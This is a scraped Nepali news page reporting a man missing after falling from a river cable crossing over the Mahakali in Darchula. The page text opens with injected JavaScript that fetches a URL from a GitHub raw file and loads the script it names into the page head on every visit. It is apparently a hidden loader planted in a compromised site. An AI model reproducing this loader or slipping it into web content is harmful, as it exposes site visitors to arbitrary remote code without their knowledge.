;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); महाकाली नदि तर्ने क्रममा तुइनबाट खसेर एक जना बेपत्ता – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • महाकाली नदि तर्ने क्रममा तुइनबाट खसेर एक जना बेपत्ता
Breaking News

महाकाली नदि तर्ने क्रममा तुइनबाट खसेर एक जना बेपत्ता

जुनेली न्यूज ,काठमान्डौ |दार्चुलाको ब्यास गाउपलिका -2 का अन्दाजी ३० बर्षीय जयशिंह धामी महाकाली नदि तर्ने क्रम मा तुइनबाट खसेर बेपत्ता भएका छन् |

बिहान साढे ८ बजेतिर 5\६ जना स्थानीय तुइनबाट नदि तर्ने क्रममा धामी बेपत्ता भएको जिल्ला प्रहरी कार्यालय दार्चुलाका प्रहरी निरीक्षक नरेन्द्र चन्दले बताएका छन् |

बेपत्ता धामीको खोजीकार्य  भइरहेको र घटनाको थप अनुसन्धान भैरहेको प्रहरीले जानेको छ |

फेसबुक प्रतिक्रियाहरु